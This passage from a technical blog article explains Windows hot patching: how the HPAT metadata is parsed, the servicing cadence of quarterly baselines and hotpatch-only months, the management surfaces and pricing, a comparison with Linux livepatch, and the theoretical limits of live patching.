  if (!hpatTableRVA) {
    return { eligible: false, reason: &apos;no HotPatchTableOffset; binary not compiled hotpatchable&apos; };
  }&lt;/p&gt;
&lt;p&gt;  const info = peImage.read(hpatTableRVA, &apos;IMAGE_HOT_PATCH_INFO&apos;);
  const bases = [];
  for (let i = 0; i &amp;lt; info.BaseImageCount; i++) {
    const baseOffset = info.BaseImageList + i * peImage.sizeOf(&apos;IMAGE_HOT_PATCH_BASE&apos;);
    const base = peImage.read(baseOffset, &apos;IMAGE_HOT_PATCH_BASE&apos;);
    bases.push(base);
  }&lt;/p&gt;
&lt;p&gt;  // The kernel verifies a patch by matching THIS image&apos;s OriginalTimeDateStamp
  // and OriginalCheckSum against the patch PE&apos;s corresponding fields. If they
  // mismatch, the kernel refuses the patch with STATUS_HOT_PATCH_FAILED.
  return {
    eligible: true,
    info,
    bases,
    bindingFields: bases.map(b =&amp;gt; ({
      stamp: b.OriginalTimeDateStamp,
      checksum: b.OriginalCheckSum,
      patchTableRVA: b.PatchTable
    }))
  };
}
`}&lt;/p&gt;
&lt;h3&gt;The three architectural differentiators&lt;/h3&gt;
&lt;p&gt;Three differences from the 2003 design, stated bluntly because they are the load-bearing distinctions:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Dedicated &lt;code&gt;NtManageHotPatch&lt;/code&gt; syscall instead of overloaded &lt;code&gt;NtSetSystemInformation&lt;/code&gt;.&lt;/strong&gt; Distinct attack surface, instrumentable separately, with its own access-control rules.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Signed PE32+ patch images verified by the Secure Kernel, not bare driver-signing on a &lt;code&gt;.hotp1&lt;/code&gt; payload.&lt;/strong&gt; The verifier sits in VTL1, architecturally distinct from the kernel that holds the &lt;code&gt;.text&lt;/code&gt; mapping.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;HPAT metadata baked into every patchable binary at compile time, not a single-flag prologue plus &lt;code&gt;.hotp1&lt;/code&gt; section pair.&lt;/strong&gt; The metadata names the patchable sites individually, with a per-site flag vocabulary that admits future operations the 2003 engine could not represent.&lt;/li&gt;
&lt;/ol&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The Secure Kernel is the load-bearing innovation, not HPAT. HPAT is mechanism -- a structurally cleaner version of the 2003 metadata, with per-site flags and binding fields the older format did not have. The architectural advance is that HVCI&apos;s &quot;executable pages were signed&quot; invariant is preserved across a hot patch &lt;em&gt;because&lt;/em&gt; the new pages came from a signed PE whose signature chains to Microsoft &lt;em&gt;and&lt;/em&gt; the normal kernel cannot bypass that verification. Linux livepatch trusts the standard module-signing policy enforced by the kernel it is patching. Microsoft&apos;s modern design moves the verifier into a different, architecturally isolated kernel.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The mechanism is now complete. What remains is the pipeline around it.&lt;/p&gt;
&lt;h2&gt;6. The three-stack decomposition: mechanism, delivery, management&lt;/h2&gt;
&lt;p&gt;There is no single thing called &quot;Windows hot patching.&quot; There are three layers that look like one thing if you squint -- and explaining them as one thing is the most common pedagogical mistake in this space. Each layer has its own engineering team, its own failure modes, its own primary documentation. Treat them in order.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Layer A -- the kernel mechanism.&lt;/strong&gt; Everything in §5: HPAT, &lt;code&gt;IMAGE_HOT_PATCH_BASE&lt;/code&gt;, &lt;code&gt;NtManageHotPatch&lt;/code&gt;, and the Secure Kernel. Microsoft documents Layer A unevenly. The structure definitions are public via the Rust windows-docs bindings (&lt;code&gt;IMAGE_HOT_PATCH_INFO&lt;/code&gt; [@ms-rs-image-hot-patch-info], &lt;code&gt;IMAGE_HOT_PATCH_BASE&lt;/code&gt; [@ms-rs-image-hot-patch-base]) and the &lt;code&gt;IMAGE_LOAD_CONFIG_DIRECTORY64&lt;/code&gt; reference [@ms-image-load-config64]. The syscall signature is in the community-maintained &lt;code&gt;ntdoc&lt;/code&gt; reference [@ntdoc-ntmanagehotpatch]. The most thorough public field-level documentation of the runtime behavior is Signal Labs&apos; reverse-engineering writeup [@signal-labs-hotpatching] and an independent PoC repository [@github-ntmanagehotpatchtests] that exercises the syscall. There is no equivalent of the kernel.org &lt;code&gt;Documentation/livepatch/livepatch.rst&lt;/code&gt; file inside Microsoft&apos;s official docs.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Layer B -- the servicing model.&lt;/strong&gt; This is where the operational pipeline lives. The Microsoft Learn reference for Hotpatch on Windows Server [@ms-server-hotpatch] describes the cadence verbatim: hot patching first establishes a baseline with the current Cumulative Update for Windows Server, and every three months that baseline refreshes with the latest Cumulative Update. Between baselines, two hotpatch-only releases ship: months in which the only payload is the security-update delta as a signed hot-patch PE.&lt;/p&gt;

**LCU**: Latest Cumulative Update. The single, full security-and-quality update bundle that Microsoft has issued monthly for Windows since the 2016 cumulative-update model. An LCU contains the union of all security fixes since the previous baseline, and applying it always requires a reboot because it lays down replacement binaries on disk and rebinds the running kernel.&lt;p&gt;&lt;strong&gt;SSU&lt;/strong&gt;: Servicing Stack Update. A specialized monthly update to the component that &lt;em&gt;applies&lt;/em&gt; updates (&lt;code&gt;wusa.exe&lt;/code&gt;, &lt;code&gt;usoclient.exe&lt;/code&gt;, the Windows Update agent state machine). SSUs cannot ship as hot patches because they update the patcher itself. They are part of the reason &quot;unplanned baselines&quot; exist: a month in which security content cannot ship as a hot patch falls back to a regular LCU.
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
&lt;p&gt;There are two types of baselines, again per Microsoft Learn [@ms-server-hotpatch]. &lt;em&gt;Planned baselines&lt;/em&gt; are the quarterly LCU drops that follow the cumulative-update cadence -- one each January, April, July, October. &lt;em&gt;Unplanned baselines&lt;/em&gt; preempt a hotpatch month when the month&apos;s security content cannot ship as a hot patch: a kernel struct-layout change, a driver update, an SSU, a language-pack update, or any security fix in a non-hotpatchable component. The promise is that the channel maintains parity with the content of security updates issued to the regular non-Hotpatch Windows update channel [@ms-server-hotpatch]. Customers who run hot patching are not getting a curated subset of fixes. They are getting the same fix set, in a different delivery mode.&lt;/p&gt;

gantt
    title Windows Hotpatch servicing cadence
    dateFormat YYYY-MM-DD
    axisFormat %b
    section Servicing
    Planned baseline LCU (reboot)  :crit, b1, 2026-01-01, 30d
    Hotpatch only                  :h1, 2026-02-01, 30d
    Hotpatch only                  :h2, 2026-03-01, 30d
    Planned baseline LCU (reboot)  :crit, b2, 2026-04-01, 30d
    Hotpatch only                  :h3, 2026-05-01, 30d
    Hotpatch only                  :h4, 2026-06-01, 30d
    Planned baseline LCU (reboot)  :crit, b3, 2026-07-01, 30d
    Hotpatch only                  :h5, 2026-08-01, 30d
    Hotpatch only                  :h6, 2026-09-01, 30d
    Planned baseline LCU (reboot)  :crit, b4, 2026-10-01, 30d
    Hotpatch only                  :h7, 2026-11-01, 30d
    Hotpatch only                  :h8, 2026-12-01, 30d
&lt;p&gt;The reboot frequency on a hot-patch-eligible fleet drops from 12 a year to 4 a year, per Microsoft&apos;s April 24, 2025 Windows Server blog [@ms-blog-server2025-hotpatch]. That 3:1 reduction is the operational claim. It is conditional on the fleet being eligible every month -- on no month&apos;s security content being non-hotpatchable -- so the realized reduction depends on which CVEs Microsoft has to fix in any given quarter.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Layer C -- the management plane.&lt;/strong&gt; Layer C is where compliance, telemetry, ring-based rollout, eligibility detection, and fallback behavior live. There are three management surfaces for the three product variants:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Azure Update Manager&lt;/strong&gt; for Azure VMs running Server 2022 Datacenter: Azure Edition and Server 2025 Datacenter: Azure Edition. The control plane is built into the VM SKU; onboarding is a SKU selection and an update-management association.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Intune Autopatch&lt;/strong&gt; for Windows 11 Enterprise 24H2 clients. The Microsoft Learn doc for Autopatch hot patching [@ms-autopatch-hotpatch] lays out the license requirements (Windows 11 Enterprise E3/E5, Microsoft 365 F3, Education A3/A5, M365 Business Premium, or Windows 365 Enterprise), the prerequisite that VBS must be turned on, and the silent-fallback behavior for ineligible devices: a Hotpatch-policy-enrolled device that does not meet the prerequisites simply receives the regular LCU instead.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Azure Arc Hotpatch&lt;/strong&gt; for Server 2025 outside Azure. The connection to Azure Arc is the delivery channel; the meter that runs at $1.50 per CPU core per month is operationalized through Arc [@ms-blog-server2025-hotpatch].&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Telemetry is a property of Layer C. The kernel patch engine reports per-process completion to the normal kernel; the normal kernel reports per-machine completion to whichever Layer C surface is in charge of that machine. Conflating &quot;the kernel reports patch success&quot; with &quot;Microsoft is telemetering my workload&quot; is wrong in the same way conflating Layer A with Layer C is wrong.&lt;/p&gt;

flowchart LR
    subgraph LayerA[&quot;Layer A: Kernel mechanism&quot;]
        A1[&quot;HPAT + IMAGE_HOT_PATCH_BASE&quot;]
        A2[&quot;NtManageHotPatch syscall&quot;]
        A3[&quot;Secure Kernel under HVCI&quot;]
        A1 --&amp;gt; A2 --&amp;gt; A3
    end
    subgraph LayerB[&quot;Layer B: Servicing model&quot;]
        B1[&quot;Quarterly baseline LCU&quot;]
        B2[&quot;2 hotpatch-only months between baselines&quot;]
        B3[&quot;Unplanned baselines for non-hotpatchable content&quot;]
        B1 --&amp;gt; B2 --&amp;gt; B3
    end
    subgraph LayerC[&quot;Layer C: Management plane&quot;]
        C1[&quot;Azure Update Manager (Server, Azure)&quot;]
        C2[&quot;Intune Autopatch (Win11 24H2 clients)&quot;]
        C3[&quot;Azure Arc Hotpatch (Server 2025, outside Azure)&quot;]
    end
    LayerC --&amp;gt; LayerB --&amp;gt; LayerA
&lt;p&gt;So: what is hot-patchable? Per the Microsoft Learn Hotpatch Autopatch documentation [@ms-autopatch-hotpatch], Hotpatch updates are Monthly B-release security updates that install and take effect without requiring you to restart the device [@ms-autopatch-hotpatch]. And what is not?&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Hot-patchable&lt;/th&gt;
&lt;th&gt;Not hot-patchable&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Security updates to function bodies inside hotpatch-compiled PEs&lt;/td&gt;
&lt;td&gt;Updates that change the layout, size, or invariants of static data structures&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;User-mode DLLs and EXEs compiled with hot-patch metadata&lt;/td&gt;
&lt;td&gt;Drivers, including ELAM drivers&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Kernel-mode drivers compiled with hot-patch metadata&lt;/td&gt;
&lt;td&gt;Boot loader components&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;The hypervisor and the Secure Kernel itself&lt;/td&gt;
&lt;td&gt;Secure-Launch / DRTM measurement-scoped binaries&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Win11 24H2 Enterprise B-release security updates on eligible (VBS-on, non-CHPE) devices&lt;/td&gt;
&lt;td&gt;Servicing Stack Updates (the patcher patches itself)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;Language pack updates&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;Defender platform updates outside the OS channel&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;.NET updates outside the OS channel&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;Any update issued outside the dedicated Hotpatch channel&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;On Arm64 Win11 24H2 clients, Hotpatch is additionally incompatible with servicing CHPE OS binaries [@ms-autopatch-hotpatch] located in &lt;code&gt;%SystemRoot%\SyChpe32&lt;/code&gt;. Operators who depend on CHPE for x86-on-Arm64 app compatibility cannot enable Hotpatch on those devices today.&lt;/p&gt;

The experience is so seamless you don&apos;t even know what happened. There are no process restarts, no logging out, no performance impact. No glitch in the video playing or transaction dropping. Everything just works as if nothing has happened. -- Nevine Geissa, Partner Group PM, Windows Servicing and Delivery, Microsoft Inside Track [@ms-insidetrack-hotpatch]
&lt;p&gt;Three layers, three failure modes. The Linux side of the story made different choices at each. The next section does the head-to-head along the axes that actually matter.&lt;/p&gt;
&lt;h2&gt;7. Windows hot patching vs Linux livepatching: different primitives, same problem&lt;/h2&gt;
&lt;p&gt;Two well-engineered systems. One shared goal. Four divergent answers. The comparison is not &quot;Windows is better&quot; or &quot;Linux is better.&quot; The comparison is that each design made specific architectural choices that follow logically from preconditions the other system did not have.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Axis&lt;/th&gt;
&lt;th&gt;Windows Modern Hotpatch&lt;/th&gt;
&lt;th&gt;Linux livepatch (in-tree, hybrid)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Redirection primitive&lt;/td&gt;
&lt;td&gt;In-place &lt;code&gt;.text&lt;/code&gt; rewrite of a signed PE image directed by HPAT&lt;/td&gt;
&lt;td&gt;ftrace &lt;code&gt;mcount&lt;/code&gt;/&lt;code&gt;fentry&lt;/code&gt; trampoline redirecting callers to a replacement function loaded as a kernel module&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Consistency model&lt;/td&gt;
&lt;td&gt;Per-process notification callback in &lt;code&gt;ntdll&lt;/code&gt;, no global pause&lt;/td&gt;
&lt;td&gt;Hybrid: per-task (kGraft) + stack-trace (kpatch) + kernel-exit + idle &quot;swapper&quot; task + forced-signal fallback&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Trust anchor&lt;/td&gt;
&lt;td&gt;Secure Kernel signature validation under HVCI in VTL1&lt;/td&gt;
&lt;td&gt;Kernel module signing policy enforced by the same kernel being patched&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Scope&lt;/td&gt;
&lt;td&gt;User-mode DLLs/EXEs, kernel drivers, hypervisor, Secure Kernel itself&lt;/td&gt;
&lt;td&gt;Kernel only (Oracle Ksplice adds glibc/OpenSSL user-mode on Oracle Linux Premier Support)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Cadence and pricing&lt;/td&gt;
&lt;td&gt;Quarterly baseline + 2 hotpatch months; free on Azure IaaS, paid Arc subscription outside Azure ($1.50/core/month for Server 2025)&lt;/td&gt;
&lt;td&gt;Ad-hoc per-CVE; distribution-included pricing on RHEL/SLES/Ubuntu/Oracle Linux&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The trust-anchor row is the load-bearing one. Linux&apos;s in-tree livepatch documentation [@kernel-livepatch-doc] describes the consistency model in considerable detail; it describes the kernel-module-signing policy in less detail because the policy is the same one Linux uses for any kernel module. The verifier is the kernel itself. If an attacker who has obtained the necessary capability to install kernel modules can also forge or replace the module-signing key, the verifier is downstream of the attacker. Windows&apos;s design moves the verifier behind an architectural boundary. The normal kernel that mediates the syscall does not perform the verification. The Secure Kernel does, in VTL1, behind a hypervisor that the normal kernel cannot subvert without first compromising the Secure Kernel directly.&lt;/p&gt;
&lt;p&gt;The redirection row is the next most consequential. The Linux design uses ftrace trampolines because ftrace had already solved the safe-rewriting problem inside Linux when kpatch and kGraft started. Layering live patching on top of ftrace meant the live-patcher&apos;s mechanical scope was small: &quot;redirect callers of this function.&quot; The Windows design rewrites the function prologue directly with an instruction-sized atomic write. The two primitives have different failure modes. ftrace adds a permanent indirection cost to every traced function on the system; the in-place rewrite has zero steady-state cost but a more complex one-time write.&lt;/p&gt;

flowchart TD
    Start[&quot;Start: install patch P&quot;] --&amp;gt; Phase1{&quot;Phase 1: stack check (kpatch)&quot;}
    Phase1 -- &quot;Task&apos;s stack clean&quot; --&amp;gt; Migrate1[&quot;Migrate task to new universe&quot;]
    Phase1 -- &quot;Patched fn on stack&quot; --&amp;gt; Phase2{&quot;Phase 2: wait for kernel-exit (kGraft)&quot;}
    Phase2 -- &quot;Task crosses kernel-exit&quot; --&amp;gt; Migrate2[&quot;Migrate at exit&quot;]
    Phase2 -- &quot;Stuck in kernel&quot; --&amp;gt; Phase3{&quot;Phase 3: idle-loop + forced-signal fallback&quot;}
    Phase3 -- &quot;Idle swapper&quot; --&amp;gt; Migrate3[&quot;Migrate idle task&quot;]
    Phase3 -- &quot;kthread&quot; --&amp;gt; Special[&quot;Reliable-stacktrace gate; kthreads remain hard&quot;]
    Migrate1 --&amp;gt; Done[&quot;Patch live for task&quot;]
    Migrate2 --&amp;gt; Done
    Migrate3 --&amp;gt; Done
&lt;p&gt;The scope row tells a related story. The November 2021 Windows OS Platform blog explicitly says Windows hot patches can target user-mode binaries, drivers, the hypervisor, and the Secure Kernel itself [@ms-techcommunity-hotpatch-nov2021]. Linux&apos;s &lt;code&gt;livepatch&lt;/code&gt; is kernel-only by design; Oracle&apos;s Ksplice has user-mode add-ons for glibc and OpenSSL available to Oracle Linux Premier Support customers [@mit-ksplice-page], but no other mainstream Linux live-patcher covers user-mode. The Windows choice to cover user-mode is operationally significant: many high-impact security fixes target services that run in &lt;code&gt;lsass.exe&lt;/code&gt;, &lt;code&gt;svchost.exe&lt;/code&gt;, or product-specific user-mode daemons, and Linux&apos;s userspace equivalent of those fixes still requires the affected processes to be restarted.The kpatch project entered maintenance mode as of Linux 6.19 [@github-kpatch]; new live-patch builds are now expected to use the upstream &lt;code&gt;klp-build&lt;/code&gt; script in &lt;code&gt;scripts/livepatch/&lt;/code&gt;. The kpatch project isn&apos;t gone -- the runtime remains, the build tooling is migrating into the tree.&lt;/p&gt;
&lt;p&gt;A brief tour of what is going on in the field today. &lt;strong&gt;Ksplice&lt;/strong&gt; is Oracle-Linux-Premier-Support-only [@mit-ksplice-page] since the 2011 acquisition, with the glibc/OpenSSL user-mode coverage being the most distinctive remaining feature. &lt;strong&gt;kpatch&lt;/strong&gt; is in maintenance mode; the build tooling has been promoted into the kernel tree as &lt;code&gt;klp-build&lt;/code&gt;, and the project&apos;s GitHub README [@github-kpatch] documents the deprecation explicitly. &lt;strong&gt;kGraft&lt;/strong&gt; survives as an out-of-tree front-end primarily for SUSE customers, with the relevant consistency-model logic having been merged into the in-tree hybrid years ago. &lt;strong&gt;Windows Modern Hotpatch&lt;/strong&gt; is the system this article is about.&lt;/p&gt;
&lt;p&gt;Both systems work. Both have ceilings. The next section is where the ceiling actually is.&lt;/p&gt;
&lt;h2&gt;8. The theoretical ceiling: what no function-replacement system can ever do&lt;/h2&gt;
&lt;p&gt;Every live-patching system on Earth ships with the same warning, in different words. There is a class of patches that none of them can apply. The class is well-defined and the explanation is not engineering -- it is logic.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Data-layout changes.&lt;/strong&gt; A patch that changes the layout, size, or invariants of any static data structure read or written by code not also being patched in the same transaction breaks every function-replacement live-patcher. Ksplice&apos;s 88% headline [@arnold-eurosys-2009-dspace] is precisely the fraction of patches that &lt;em&gt;happen to&lt;/em&gt; leave data structures alone. The 12% that does not is what every live-patching design defers to reboot.&lt;/p&gt;
&lt;p&gt;The reason is structural. Suppose a kernel struct &lt;code&gt;foo&lt;/code&gt; has fields &lt;code&gt;(a, b, c)&lt;/code&gt; and the patch wants to add a field &lt;code&gt;d&lt;/code&gt;. Every function that reads or writes a &lt;code&gt;foo&lt;/code&gt; operates on the old layout; new functions added by the patch operate on the new layout. The transition window contains threads in flight that hold pointers into the old struct, and any new code that allocates or writes a &lt;code&gt;foo&lt;/code&gt; would corrupt them. The general algorithmic question -- &quot;can this layout change be applied safely to an arbitrary running kernel?&quot; -- is undecidable in the general case, because deciding it is equivalent to deciding what an arbitrary running program&apos;s memory invariants are.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Rice&apos;s theorem says that every non-trivial semantic property of a program is undecidable. The property &quot;this layout change is safe on the running kernel&quot; is non-trivial and is a semantic property of the running program. Therefore no general algorithm decides it. Ksplice&apos;s shadow-data-member trick handles the easy case (additive-only fields) by allocating the new field out-of-band per object; it works because additive changes have a closed-form correctness argument. The hard cases -- changing field types, changing alignment, reordering, removing a field used elsewhere -- have no closed-form argument, and no live-patcher ever invented one.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;strong&gt;Boot-anchored measurements.&lt;/strong&gt; ELAM (Early Launch Anti-Malware) drivers, DRTM (Dynamic Root of Trust for Measurement) and Secure Launch components, and other measurement-scoped binaries have their hashes &lt;a href=&quot;https://paragmali.com/blog/measured-boot-the-tcg-event-log-from-srtm-to-pcr-bound-bitlo/&quot; rel=&quot;noopener&quot;&gt;extended into TPM PCRs at boot&lt;/a&gt;. A hot patch that mutates such a binary after attestation breaks the post-attestation invariant: the verifier downstream of the attestation expected a measured value that no longer corresponds to the running binary. The post-rewrite memory is &lt;em&gt;not&lt;/em&gt; inside the original attestation envelope; the attestation has to be re-rooted, which requires a reboot. Microsoft&apos;s exclusion list reflects this -- drivers (including ELAM), boot-loader components, and Secure Launch / DRTM measurement-scoped binaries are not hot-patchable in the published servicing model [@ms-server-hotpatch].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Inlined or always-on-stack code.&lt;/strong&gt; Function-replacement systems require a single entry point per logical function. A function that has been inlined into every caller has no entry point to patch. A function that is always somewhere on a stack -- kpatch&apos;s classic examples of &lt;code&gt;schedule()&lt;/code&gt;, &lt;code&gt;do_wait()&lt;/code&gt;, and &lt;code&gt;irq_thread()&lt;/code&gt; -- effectively behaves as if inlined for the purpose of the live-patcher, because the stack-check phase can never converge on a quiescent moment. LWN&apos;s coverage estimated a few dozen such functions on a typical Linux kernel [@lwn-kpatch-597407]; the equivalent class for Windows is the never-quiescent kernel entry points that one cannot patch without first taking the system out of operation.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Concurrency invariants.&lt;/strong&gt; Lock-free algorithms, RCU readers in flight, and code execution orderings that the patch quietly changes require quiescence beyond what any function-replacement primitive offers. The Linux livepatch consistency-model debate at LWN 634649 [@lwn-livepatch-consistency-634649] and the kernel.org &lt;code&gt;livepatch.rst&lt;/code&gt; §7 &quot;Limitations&quot; [@kernel-livepatch-doc] document this class of constraint: a patch that subtly changes the order of memory operations in a function that participates in a lock-free protocol can leave readers observing impossible states across the transition. The literature on this is mostly cautionary, not exhaustive; the live-patcher&apos;s job is to assume any patch that touches concurrent code is unsafe by default and require the patch author to argue otherwise.&lt;/p&gt;
&lt;p&gt;The empirical upper bound, again, is the Ksplice 88% number from a finite window of x86-32 Linux security patches between May 2005 and May 2008. Microsoft has not published a comparable automation-rate study for the modern Windows pipeline; the public claim is that the channel maintains parity with the content of security updates [@ms-server-hotpatch] issued to the regular non-Hotpatch channel, with unplanned baselines preempting hotpatch months when the content is not eligible. That is an operational claim, not a percent-of-CVEs measurement.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The ceiling on every live-patching system is Rice&apos;s theorem applied to memory-layout semantics. No general algorithm decides whether an arbitrary data-layout change is safe to apply to an in-flight program; therefore every live-patcher treats data-layout changes the same way -- defer to reboot. The 12% that remains is the open research problem live-patching has been carrying for 18 years; Ksplice&apos;s 88% set the ceiling no successor has moved.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The remaining 12% is the problem of the next generation. The open problems are the subject of §9.&lt;/p&gt;
&lt;h2&gt;9. Open problems: where the pipeline is still evolving&lt;/h2&gt;
&lt;p&gt;Hot patching is &quot;done&quot; only in the sense that it ships. Four problems remain open as of May 2026.&lt;/p&gt;
&lt;h3&gt;9.1. Confidential VMs and the attestation envelope&lt;/h3&gt;
&lt;p&gt;AMD SEV-SNP [@azure-confidential-vm-overview] and Intel TDX [@intel-tdx-overview] provide a measured launch of a guest VM image attested to a relying party. Microsoft&apos;s own Azure confidential-VM documentation states the contract verbatim: &quot;Azure confidential VMs boot only after successful attestation of the platform&apos;s critical components and security settings&quot; [@azure-confidential-vm-overview], and an in-VM workload can issue an attestation request to &quot;verify that your confidential VMs are running a hardware instance with either AMD SEV-SNP, or Intel TDX enabled processors.&quot; The attestation establishes that a specific image -- byte for byte, hash for hash -- is what is running inside the confidential VM. If &lt;code&gt;NtManageHotPatch&lt;/code&gt; later rewrites guest &lt;code&gt;.text&lt;/code&gt;, is the post-rewrite memory inside the attestation envelope? Does the relying party need to re-verify? Microsoft has not publicly documented this interaction. The hot-patch SKU eligibility list [@ms-server-hotpatch] covers Server 2022 and Server 2025 Datacenter: Azure Edition; confidential VM SKUs run on adjacent Azure infrastructure; the documented intersection is a gap. Framed as a documented gap, not speculated beyond.&lt;/p&gt;
&lt;h3&gt;9.2. The subscription metering question&lt;/h3&gt;
&lt;p&gt;$1.50 per CPU core per month for Server 2025 hot patching over Azure Arc is the first time a major OS vendor has metered live patching with a per-CPU-core meter [@ms-blog-server2025-hotpatch] rather than per-machine (Canonical Livepatch via Ubuntu Pro) or per-CPU-pair (Oracle Ksplice bundled into Oracle Linux Premier Support). Azure Arc is itself a management plane, so the framing is &quot;metered, per-core, on a management plane&quot; rather than &quot;metered outside any subscription tier.&quot; Forbes&apos; coverage [@forbes-150-hotpatch] confirms the pricing and the July 1, 2025 GA. The economic question -- does pricing accelerate or decelerate patch adoption across the global Windows Server fleet? -- has no public data yet. The fairness question -- should faster patching cost more, when faster patching makes the world safer? -- has no answer that does not depend on assumptions about which fleets are doing the patching.&lt;/p&gt;
&lt;h3&gt;9.3. Detection and abuse of the same primitive&lt;/h3&gt;
&lt;p&gt;Signal Labs has shown that the same &lt;code&gt;NtManageHotPatch&lt;/code&gt; mechanism can be repurposed for in-memory code injection PoCs under specific privilege conditions [@signal-labs-hotpatching]; an independent PoC repository [@github-ntmanagehotpatchtests] corroborates by exercising the syscall against a controlled target. The risk is structurally similar to the 2003-era hot-patch abuse Microsoft disclosed in April 2016, but with two important differences: the modern path requires the Secure Kernel to validate a signed payload (the 2003 path did not), and operators have an explicit registry knob -- &lt;code&gt;HotPatchRestrictions=1&lt;/code&gt; at &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management&lt;/code&gt; [@ms-autopatch-hotpatch] -- documented as the way to disable CHPE servicing on Arm64 so those devices remain eligible for hot patching. EDR vendors who want to distinguish legitimate Microsoft-signed hot patches from hostile injection have to instrument both the syscall and the registry state. This is solvable, but it is not solved by default in every EDR.&lt;/p&gt;
&lt;h3&gt;9.4. Arm64 client porting and CHPE&lt;/h3&gt;
&lt;p&gt;Arm64 Windows 11 24H2 hot patching [@ms-techcommunity-hotpatch-client-apr2025] remains in preview as of the April 2025 GA for x64, with the CHPE compatibility issue [@ms-autopatch-hotpatch] acting as the visible technical gate.The CHPE constraint is documented at Microsoft Learn verbatim: Hotpatch updates are not compatible with servicing CHPE OS binaries located in the &lt;code&gt;%SystemRoot%\SyChpe32&lt;/code&gt; folder [@ms-autopatch-hotpatch]. CHPE (Compiled Hybrid Portable Executable) is the format Windows uses to speed up x86 applications on Arm64 by inlining native Arm64 code into x86 binaries. The hot-patch metadata format and the CHPE format have an unresolved interaction in the current toolchain.&lt;/p&gt;
&lt;p&gt;The Linux equivalent of the Arm64 porting story is the &lt;code&gt;HAVE_RELIABLE_STACKTRACE&lt;/code&gt; gate [@kernel-livepatch-doc] and the related kthread caveats. Kthreads on architectures without reliable stack-trace support remain a hard case for the in-tree hybrid consistency model.&lt;/p&gt;
&lt;p&gt;For an operator deciding &lt;em&gt;today&lt;/em&gt; which of these open problems matters, the answer depends on which of the three Windows products is theirs. The next section is the practical decision tree.&lt;/p&gt;
&lt;h2&gt;10. The operator&apos;s decision: adopting hot patching in 2026&lt;/h2&gt;
&lt;p&gt;The operator question is not &quot;should I hot-patch?&quot; but &quot;which of the three products is mine and what does it actually cost?&quot; Walk through the tree.&lt;/p&gt;
&lt;h3&gt;10.1. Windows Server 2022 Datacenter: Azure Edition&lt;/h3&gt;
&lt;p&gt;Free on Azure IaaS. The product was announced as generally available on February 16, 2022 [@techcommunity-server2022-ga-feb2022] (this is also confirmed by a contemporaneous external mirror [@thewindowsupdate-2022]). Onboarding is a SKU selection (&lt;code&gt;-Hotpatch&lt;/code&gt; suffix variants), an Azure Update Manager association, and a baseline alignment to the current LCU. The Server 2022 hotpatch initially shipped Server-Core-only; the Desktop Experience GA on July 18, 2023 [@techcommunity-server-desktop-experience] removed the operationally-large adoption blocker for admins who refused Server Core. From that date forward, all common Server 2022 Azure Edition VM configurations are hot-patch-eligible.&lt;/p&gt;
&lt;h3&gt;10.2. Windows Server 2025 Datacenter / Standard via Azure Arc&lt;/h3&gt;
&lt;p&gt;$1.50 USD per CPU core per month outside Azure, generally available since July 1, 2025 [@ms-blog-server2025-hotpatch]. Free on Azure IaaS / Azure Local for Server 2025 Datacenter: Azure Edition VMs. The math at $1.50/core/month is mechanical: a 128-core machine is $192/month or $2,304/year for the hot-patch subscription; an eight-machine 128-core cluster is $18,432/year. Whether that price is justified depends on the operator&apos;s per-reboot cost.&lt;/p&gt;

